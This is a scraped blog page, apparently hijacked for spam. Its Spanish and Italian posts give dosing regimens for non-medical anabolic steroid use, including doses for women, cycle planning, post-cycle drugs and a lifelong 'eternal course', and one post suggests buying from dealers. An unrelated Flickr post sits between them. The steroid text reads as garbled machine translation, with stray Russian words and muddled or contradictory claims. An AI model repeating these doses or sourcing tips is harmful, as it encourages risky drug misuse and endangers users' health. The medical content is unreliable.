Con el uso prolongado de dosis altas de la droga puede manifestarse el fenómeno de virilización, a saber – aumento del crecimiento del vello facial y corporal. Pero esto es con uso prolongado y dosis altas. Aunque no es necesario subestimar esta característica de la droga, la dosis de alrededor de 100-200 mg por semana durante 4-5 semanas es poco probable que conduzca a la virilización. Curiosamente, la mezcla de undecilenato de boldenona y dipropionato de methandriol, conocido en nuestro país bajo la marca «Meprobolona» es más aceptable para las mujeres que la propia boldenona.

Propionato de testosterona

Propionato de testosterona puede, con algunas reservas, ser recomendado para su uso por las mujeres. En cualquier caso, su uso, según Yuri Bombella, es más seguro para las mujeres que el uso de nadrolona. A diferencia de los hombres, las mujeres del sexo débil deben recibir inyecciones con mucha menos frecuencia, una vez cada 4-6 días. El volumen habitual de una inyección es de 25-50 mg de la droga. En caso de virilización de la inyección debe detenerse inmediatamente.

Oral turinabol

El fármaco puede considerarse lo suficientemente seguro para las mujeres, en dosis moderadas durante un corto período de tiempo no conduce a la aparición de fenómenos de virilización. Esto también lo confirma la práctica de su uso.

Nandrolón

Cabe señalar que la nandrolona en los años 50 a 60 del siglo pasado se utilizó ampliamente para tratar a las mujeres en la medicina tradicional. Hasta principios de los años 90 del mismo siglo, fue utilizado activamente por las mujeres en la práctica deportiva. La posición de la nandrolona fue sacudida por los experimentos de Gusens y Heinonen. En el primer caso, las mujeres tomaron 50 mg de decanoato a una dosis de 50 mg cada 3-4 días, y el 50% de ellas experimentaron virilización. En el segundo caso, se encontraron fenómenos de virilización en todos los sujetos, pero no se reportaron dosis.

Sin embargo, la dosis de 100 mg por semana (50 mg una vez cada 3-4 días) para las mujeres puede considerarse claramente exagerada. En un experimento realizado en 1996, la dosis de nandrolón, de nuevo decanoato, era extremadamente baja: 30 mg cada dos semanas. Aquí, nadie ha experimentado los efectos de la virilización. Estas dosis deben considerarse como extremos, y aquellos que quieren experimentar con nadrolona se les puede aconsejar que «equilibren» entre ellos. Naturalmente, cuando aparecen los primeros signos de virilización, el medicamento debe ser detenido inmediatamente.

Antiestrógenos

Está claro que el uso de los inhibidores de la aromatasa en las mujeres no tiene sentido. Además, la disminución de los niveles de estrógeno conduce a la agravación de los fenómenos de virilización.

La clomida (citrato de clomifeno) y el tamoxifeno se utilizan como terapia posterior al tratamiento.

Además de un fármaco como la aminoglutetimida (orimetano, citadren) y la clomida, y especialmente el tamoxifeno, se utilizan ampliamente en la práctica médica para el tratamiento del cáncer en las mujeres. Ambos fármacos permiten corregir el fondo hormonal cambiando la proporción de estradiol/testosterona a favor de este último. Las dosis pueden ser las mismas que para los hombres.

La información sobre el uso de aminogluthetimide no es infrecuente. Aminogluthetimide no sólo es un inhibidor de la aromatitis, sino que también suprime la biosíntesis de estrógeno y cortisol, es decir, tiene un efecto anticatabólico.

05.02.2018

Cómo hacer un curso de esteroides

por editor

En primer lugar, para hacer un curso óptimo, es necesario definir los conceptos:

Esteroides aromatizantes: medicamentos que pueden convertirse parcialmente en estrógenos (testosterona, metandrostenolona, metiltestosterona).
Esteroides no aromatizables: esteroides que no se convierten en estrógenos o que se convierten deficientemente (oxandrolona, drostanolona, trenbolona, primo-bolano, turinabol, boldenona, nandrolona, estanazolona).
Esteroides con actividad progestágena (progestinas) – tienen la capacidad de unirse a los receptores de progesterona (nandrolona, trenbolona, en menor medida oximetolona).

Curso sin efectos secundarios

Si sólo se incluyen medicamentos no aromatizantes en el curso, no se requiere ningún suplemento farmacológico.
Si hay productos aromatizantes en el curso, se recomienda añadir un inhibidor aromatizante (anastrozol/arimidex, aromazina) al curso para prevenir la ginecomastia estrógeno-dependiente y la acumulación excesiva de agua, pero pueden reducir la eficacia del curso, ya que el estrógeno también es necesario para el cuerpo, y se debe realizar una prueba de estradiol antes del curso también.
El anastrozol (disponible en la farmacia, pero caro, por lo que muchas personas lo compran a los distribuidores a un precio más bajo) es de 0,5 mg (media pastilla) por día. Análogos: Anastrazol=Celana=Arimidex=Egystrazol=Anastraver=Farmazol.
Exemestan (disponible en la farmacia, pero caro) comienza en 12.5 mg (medio día). Análogos: Exemestan=Aromazina=Exedrol.
Cuando se toman inhibidores de aromatización (IA), es necesario controlar el nivel de estradiol mediante pruebas para que no descienda por debajo del nivel prescrito. Si el nivel cae por debajo de lo normal, la dosis o frecuencia de administración debe ser reducida. Idealmente, el límite superior de las tasas de estrógeno debe ser buscado (pero no superado), ya que también son participantes importantes en los procesos anabólicos.
Si hay progestinas en el curso, se recomienda agregar un bloqueador de prolactina (cabergolina o bromocriptina), que se toma durante la noche, para prevenir la ginecomastia por prolactina.
La bromocriptina (no es costosa, pero tiene muchos efectos secundarios) debe tomarse a 2.5 mg por día.
Kabergoline (caro, con casi ningún efecto secundario) debe ser tomado 0.25 mg cada cuatro días. Análogos: Kabergolin=Dostinex=Bergolak=Agalates
Cuando se toma el bloqueador de prolactina, es necesario controlar el nivel de prolactina para que no caiga por debajo del nivel establecido. Si los resultados de las pruebas muestran que el nivel por debajo del nivel prescrito debe reducir la dosis o la frecuencia de administración. Conecte estos medicamentos, dependiendo de qué ésteres de esteroides anabólicos estén en el curso. Si son cortos, si son largos, deben usarse con ellos después de que los esteroides anabólicos hayan sido incluidos en el trabajo.

Uso de gonadotropina coriónica (hCG)

El uso de la hCG está justificado sólo en cursos largos (más de 8-12 semanas) para prevenir la atrofia testicular. Cabe señalar que el volumen testicular no siempre se correlaciona con el grado de atrofia.
No se recomienda el uso de hCG durante el PCT stero market.
Por lo general, la hCG list se administra al final del curso (las últimas 2 semanas del curso son 250-500ME 3 veces a la semana dependiendo del grado de atrofia), si el curso es muy largo (más de 20-24 semanas), entonces la introducción de la hCG es aconsejable en la mitad del curso.

Terapia posterior al tratamiento (PCT)

Es necesario no sólo para hacer un curso competente de esteroides anabólicos, sino también para llevar a cabo una terapia después del curso para restaurar la función del eje testicular hipotalámico-hipófisis. El PCT debe realizarse después de cada curso. No importa si era un solo de oxandrolona o una combinación de Testosterona+Deck+Metano. La tarea del PCT es hacer que su cuerpo vuelva a producir su propia testosterona, de lo contrario, después de que se suprima la CAA, la masa acumulada colapsa y se produce una reducción de la libido. La base de cualquier PKT es antiestrógeno (toremifeno, clomifeno, tamoxifeno), así que lo primero que hay que hacer con PKT es tomar antiestrógeno, y tribulus, zinc y vitaminas en el segundo.

El tamoxifeno es fuerte y barato, pero extremadamente tóxico, y puede tener efectos secundarios desagradables.
El Klomifen (Klostilbegit) es menos potente que el Tamoxifen, caro, pero mucho menos tóxico.
Toremifeno (Fareston) – una nueva generación de medicamentos, fuertes, baratos, los efectos secundarios se minimizan.

Es necesario tomar sólo uno de cada 3, no los 3 al mismo tiempo.

A partir de la segunda semana de PKT es posible conectar farmacia tribestan (tribulus terresteris), 750 mg al día (convertido a saponinas de furostanol), preparados de zinc y vitaminas de acuerdo a las instrucciones. Sin embargo, por el momento no existen pruebas fiables de la eficacia de estos fármacos.
Si se han utilizado esteroides orales o stasolol inyectable en el curso, entonces se utilizan agentes coleréticos (coloso, calabaza) de acuerdo con las instrucciones.

No se recomiendan medicamentos hepatoprotectores como Carsil y similares, ya que pueden causar estancamiento de la bilis. También es aconsejable controlar el estado del hígado mediante análisis de sangre (las enzimas ALT y AST aumentan con el daño hepático). Si algún tiempo después de la cancelación de los medicamentos orales y de cualquier fármaco alfa-17 alquilado, la función hepática no está normalizada, se recomienda el uso de Heptral para la administración intravenosa.

Si usted ha estado tomando progesterina pero no ha tomado Kabergoline/Bromocriptine como profilaxis durante el curso, entonces Kabergoline/Bromocriptine debe ser tomado con PCT en paralelo con la administración de antiestrógenos.

El PCT debe iniciarse en función de los ésteres de la AAS que se encuentren en el curso. Si es corta, el día después de la última dosis, si es larga, de 1 a 4 semanas después de la última inyección, dependiendo de la vida media de la CAA más larga.

Notas importantes

Si había progestina en el curso, no se recomienda el tamoxifeno ya que aumenta el número de receptores de progesterona.
Proviron se toma a veces como un andrógeno en caso de problemas de potencia debido a la deficiencia de testosterona. Sin embargo, no olvide que ProViron (Mesterolona) puede inhibir la producción de gonadoliberina y LH y hacer difícil restaurar la secreción de su propia testosterona.
El uso de medicamentos potentes se lleva a cabo sólo bajo el control de un médico! Sólo un médico especialista con una cuidadosa evaluación de los riesgos, de las características individuales y de los parámetros de cada organismo puede realizar un curso óptimo y seguro.
Y también es necesario incluir cepas androgénicas de alta gama en todos los cursos, preferiblemente TESTOSTERON, ya que controla muchos procesos del cuerpo masculino: tejido óseo, perfil lipídico, libido, etc.
El curso se basa principalmente en drogas inyectables; el curso de ésteres largos después de la cancelación de la ingesta se recomienda el uso de propionato de testosterona durante dos semanas.

Es necesario reducir la frecuencia y la intensidad del entrenamiento con PKT para reducir el retroceso.

19.01.2018

Tus expos con Flickr

por comcinco

Si te gusta la fotografía, Flickr te propone una interesante forma de convertirte en comisario de exposiciones (curator) online. Ahora puedes seleccionar obras de otros usuarios en función de la temática o el estilo que se te ocurra. Una nueva funcionalidad ideal para los que nos gustan más las fotos de los otros…

Si hay una plataforma que se ha consagrado como la líder en la publicación de fotos de los usuarios es Flickr. En los últimos tiempos, además, han añadido funcionalidades que permiten que los egos de los diferentes artistas convivan en una completa armonía 2.0

La verdad es que en este portal encontramos verdaderas maravillas y ya es hora de que se reivindique el lugar que tiene en el arte todo lo que está online. Aquello que se ha llamado Net.Art y que, a día de hoy, se encuentra disperso en una serie de actitudes que, quizás por su falta de elitismo, no tienen el reconocimiento que se merece en el circuito del arte institucionalizado. Algo que pasaba con el Graffiti y que ahora incorporan los más afamados museos y galerías ¿Veremos algún día Expos de Flickr en galerías de arte?

Para abrir boca, y nunca mejor dicho, os pongo unas imágenes de una expo sobre comida

>> Tienes más información en la página de ayuda de Flickr.

15.01.2018

Corso classico di steroidi

por editor

Ciao, amici!

Oggi sfiorero incredibilmente vasto e cosi il soggetto interessante, vale a dire: corso eterno di steroidi.

Veramente, il soggetto e cosi vasto che non ci sara abbastanza anche il giorno che su esso per raccontare cosi, in questo articolo La condurro a digressione corta di un gioco ormonale, sara molto interessante!

Dunque, che cosa e «Il corso eterno di steroidi»? E facile da indovinare che questo uso di steroidi in ogni parte d’intervallo molto largo di tempo o tutta la vita. Comunque, come molti pensano, non e standard «суст, una scheda audio, il metano» per il resto di vita, per niente. E su un corso eterno non tutto e cosi iridescente come puo sembrare a prima vista, sulla strada aspetta molte scogliere.

Prima di tutto, una base di un corso eterno – testosterone, qualsiasi aria conveniente per Lei. CominciandoLe un corso eterno che e necessario riconciliare a un pensiero che tutti Loro la vita useranno il testosterone nella sua varia aria e dosaggi, la strada indietro non e presente e non sara, mai ritornera al livello precedente di ormoni dopo di 3-5 anni su un corso, e piu tardi sopra la fortuna che e entrata su un corso, non sara capace di vivere piu con il livello solito di ormoni.

Nonostante il fatto che una base di qualsiasi eterno (e qualsiasi altro) un corso – sia necessario cambiare il testosterone, il tempo di medicine in 3-6 mesi se certamente vuole questo. E consigliato fare tale, per esempio, le transizioni: enantathe- cypionate list – propionate list – sustanone pagina e su nuovo.
E adesso, classificheremo tutti gli aspetti di un corso eterno in modo piu dettagliato.

1. Aria di testosterone.

Secondo la mia opinione, il piu adatto e l’aria dell’enantat o tsipionat, la catena radiofonica lunga permette di fare iniezioni di tempi in tre giorni, senza perdere nello stesso momento in efficienza. Anche, sara l’opzione abbastanza buona сустанон, bene, e la maggior parte, secondo la mia opinione, propionate sara la piu cattiva (o se Lei assolutamente il pazzo – la sospensione di testosterone).

Consiglio di comprare il testosterone solo in farmacia come solo la puo essere sicuro della sua purezza, qualita e quantita della sostanza necessaria. Comunque, se in farmacia non c’e aria necessaria o gli steroidi nel Suo paese sono vietati, che fare, e necessario comprare da «spacciatori» o in deposito in linea di steroidi.

A proposito, non e consigliato usare medicine di Nebido siccome sono adatti solo in caso di HRT (l’ormone di terapia di sostituzione) su un corso eterno.

2. Uso di steroidi anabolici su un corso.

Siccome il corso a noi consiste di testosterone, e possibile chiamarlo androgenico, ci dara sopra un umore statale, eccellente e un’energia, per farci dall’uomo nel senso vero della parola, comunque, l’assolo di testosterone non ha l’effetto anabolico veramente alto percio (e non solo), prima o poi deve includere lo steroide anabolico nel corso. Lo steroide anabolico che e accettato a chiamare una tale medicina a cui l’indice anabolico e piu alto androgenico, per metterlo brevemente, praticamente tutte le medicine, eccetto testosterone.

Di regola, lo steroide anabolico prende parte a un corso come segue: 6-12 settimane su steroide anabolico forte (trenbolone, l’aria lunga di un nandrolon, анаполон e dopo di 6-12 settimane su steroide anabolico e piu debole (данабол, мастерон, винстрол. «Il ponte» successivo, cosiddetto – riposa da formazioni intensive pesanti, la quantita enorme del cibo e i dosaggi di steroidi diventano, il ponte e effettuato solo su testosterone in piccolo (di regola) i dosaggi. Comunque, queste regole non sono solide e ogni giocatore ormonale stesso decide come fare il corso eterno di steroidi, alcuni non fanno ponti affatto sebbene, sia teso di problemi con quello che – in sezione adatta scrivero.

E consigliato aumentare non fortemente dosaggi di testosterone su «corsi» siccome gli steroidi anabolici rafforzeranno la sua azione, riducendo GSPG.

3. Effetti collaterali, malattie, problemi su un corso.

La sezione piu vasta di articolo in cui provero a considerare tutti i problemi conosciuti adesso che puo alzarsi su un corso eterno. Li elenchero cominciando dal piu serio, a quelli che possono esser trascurati.

1) Colesterolo.

Su un corso, e particolarmente eterno, un rapporto il colesterolo cattivo e buono cambia in favore dell’ultimo che puo portare (e porta, sebbene non sia veramente frequente) a ostacolo di navi e di conseguenza, a colpi. Per prevenzione di esso e necessario fare costantemente prove (una volta al mese e raccomandato) e seguire le raccomandazioni del dottore su diminuzione in colesterolo (male).

2) Sovraformazione.

Peretren. Su un corso eterno – nemico molto terribile. Verra impercettibilmente e non pensera che subito, per di piu, perfino перетрен non La preverra per crescere nel peso e forzare, ma puo il gran sistema nervoso centrale di zuffa. All’atto di sovraformazione non sara capace normalmente di dormire, sara difficile da addormentarsi, ci sempre sara non sufficiente energia, la libido e uno spirito vitale possono cadere, diventera passivo e apatico, comunque, perfino la serie di questi effetti non e il segno del 100% di sovraformazione. Per imparare precisamente, e necessario fare prove su progesterone e cortisol, e gia possibile fare da giudice da loro. In caso di un peretren e necessario abbassarsi dosaggi di testosterone approssimativamente a 250-1000 mg alla settimana (secondo le dosi usate su un corso), completamente escludere attivita fisiche e accettare una grande quantita di frutto di verdure e di carboidrati e anche grassi di animale durante 4-6 settimane. Dopo riposo e necessario entrare in processo gradualmente di formazione e non e consigliato usare stimulators (come EKA) nelle prossime settimane dopo riposo.

3) «Cuore di toro».

Problema che il 80% della popolazione presente della grande faccia di citta. Di regola, tutti sanno che questo cosi, il senso di descrivere non e presente, diro solo che all’atto di apparizione dei primi segni (il ristagno, l’eccedenza o una mancanza di adrenalina e cortisol, eccetera) e necessario avere un riposo allo stesso modo, cosi come in opzione con peretreny.

5) Atrofia di testicoli.

Veramente, fa miti e le supposizioni intorno ai nostri testicoli molto (le uova, in altre parole). Tutti sanno che molto male lavorano a un corso eterno quando il testosterone arriva dall’esterno. A molti l’atrofia e mostrata evidentemente: riduzione di volumi di testicoli, riduzione di numero dell’eyakulyat, e cosi via. Fortunatamente, alcuni (e me compreso) sono stati fortunati, e su loro gli effetti di un’atrofia non sono praticamente mostrati, ma, il genere di non c’e stato, i testicoli sempre diminuiranno tale.

Per tenere le loro dimensioni, e quello che e ancora piu importante, per tenere la funzione riproduttiva, vale effettuare il tempo in 5-6 mesi il ponte con iniezioni parallele di un gonadotrophin su 500 ME un giorno si e uno no, gia non incolleremo il 2000 ME. Se ha usato dosi alte di medicine o le loro forme «pesanti», allora i dosaggi di un gonadotrophin possono esser aumentati fino a 1.000 ME un giorno si e uno no, completamente prendendo 5000. Ma non deve mettere un gonadotrophin piu spesso che tempo in 5 mesi e piu di 2.500 ME durante tempo affatto. L’approccio simile non dara niente buono, e solo condurra a un desintezation di testicoli – la loro immunita piena al FSG e LG.

6) Problemi con un’erezione.

Veramente, all’atto dell’ approccio corretto e l’amministrazione di medicine, questo problema non puo alzarsi in linea di principio. Se tutto di Lei «si e impigliato pigro» allora parecchie opzioni:

  • a) Riduciamo un estradiol per fare riferimento a valori (se non l’ha fatto ancora prima).
  • b) Riduciamo prolactin per fare riferimento a valori.
  • c) Togliamo da un corso tutte le medicine con attivita progestiny.
  • d) Aggiungiamo il +50% alla quantita dei carboidrati mangiati in un giorno.
  • Se fa tutti summenzionati, e l’erezione non ritornera – un problema di salute mentale, non con fisiologia.

7) Sterilita.

Viene al 95% della gente su un corso eterno per le ragioni descritte nel Paragrafo 5, comunque, molto facilmente e eliminato. Quando e necessario fare il bambino, un corso di iniezioni di un gonadotrophin su 5.000 ME un giorno si e uno no durante due settimane, ricevimento di un klomid su 25-50 mg al giorno, un’immissione di vitamina E in dosaggi necessari per Lei, e un proviron (proviron) e condotto. Di regola, dopo terapia simile e possibile concepire il bambino. Se non succede, e necessario vedere un dottore, comunque, adesso la sterilita e curata quasi sempre.

8) Acne.

Il problema e mostrato spesso, particolarmente a dosaggi alti di testosterone ed estradiol alto. Comunque, e risolto abbastanza semplicemente: sapone di catrame, tetracycline unguento, o in seguito a mescolanza: alcool di salicylic + aspirina + левомецитин. Tutto questo e applicato a brufoli che permette di liberarsi in brevi termini di loro, comunque, sara possibile guarirli completamente solo con l’aiuto di Roakkutan o la visita costante di procedure cosmetiche, ma soltanto e piu semplice minimizzare questo problema.

9) Crescita abbondante di capelli su un corpo e

4. Controllo di ormoni, GSPG.

Per un inizio annotero che su un corso eterno e vitale fare costantemente prove e guardare i loro indizi, e su loro per aggiustare un quadro. Per esempio, in parallelo con testosterone in un organismo gli aumenti di estradiol, deve esser ridotto anastrozoly in dosaggi, individuo per tutti (comunque, durante tempo l’organismo si abitua a dosaggi alti di testosterone e la sua gia piu piccola quantita sara trasformata a un estradiol), e indirettamente puo alzare e prolactin, e necessario ridurlo come segue: le targhe di 1/3 di un kabergolin alla settimana se non c’e progestinykh di medicine sono conscie anche 1 targa alla settimana se sono.

Bene, e cosa adesso molto interessante – GSPS – il globulin collegamento di ormoni sessuali. Provero a spiegare brevemente che questo. La questione e che il testosterone nel nostro organismo e in due stati diversi: libero (i lavori) e collegato (non lavora) con globulin. E cosi, ci lasci assumere, globulin a noi 70 unita. Siamo entrati in 100 unita di testosterone e 70 di loro globulin collegato. E, su, da 100 ме accogliamo lavoratori solo 30 unita. Con questo scopo anche gli steroidi anabolici sono necessari e conscio – per ridurre globulin. Molto bene i globulin riducono станазолол (stanozolol) e провирон se accettarli 2-3 settimane con alcuna pausa tra «corsi». Allora, entrando in 100 unita di testosterone (globulin sara gia uguale, per esempio, a 10 unita), accoglieremo lavoratori – 90 unita.

Nota: ho usato unita condizionatamente che e stato piu facile da capire un’essenza di lavoro di GSPG, praticamente tutto e misurato in % e mg.

5. PKT.

Adesso parlero poco di PKT. Appena mai deve scendere da un corso eterno, ma c’e qualcosa cosi, e necessario considerarlo anche.
PKT dopo un corso che fu piu lungo che anno e effettuato come segue:

8 punture di HGCh per 1.000 ме, un giorno si e uno no
E insieme con esso durante 45 giorni:
20 mg di tamoxifen un giorno (10 mg due volte al giorno);
100 mg di un klomid al giorno (50 mg due volte al giorno).

Facciamo SOLTANTO se:

– fatto due (2) PKT a tutti gli efetti che dura 30-45 giorni tutti, avendoli cominciati a tempo debito dopo della fine di ricevimento di AAS.

– le prove fatte e il nostro testosterone generale da risultati di due PKT ancora sono nel terzo piu basso di valori di referenza (vicino a 10o nmol/l), nello stesso momento l’estradiol e prolactin sono in limiti di norma, che e non puo prevenire il restauro, sopprimendo la secrezione di gonadotrophins.
Facciamo la prova sul testosterone generale e un estradiol per il 21esimo giorno di terapia, e per di 42 giorni di terapia, allora – in un mese dopo completamento di terapia.

Questo metodo per tutti sara identico. Qualche volta e necessario effettuare due tale il 45-tidnevnykh di un ciclo.
Anche, rispondero immediatamente:

Di regola, un tale schema PKT lavori se non dal primo, allora a partire dalla seconda volta precisamente, e controllato praticamente.

Dunque, gli amici, in questo articolo ho considerato brevemente molte domande che si alzano su un corso eterno, un soggetto veramente vasto e, sono sicuro, ancora piu che una volta su esso scrivero.

Prima di nuovi incontri!

Acerca de Taburete
El blog Taburete está hecho con Wordpress 4.8.12 para ZEMOS98.
Follow

Get every new post on this blog delivered to your Inbox.

Join other followers: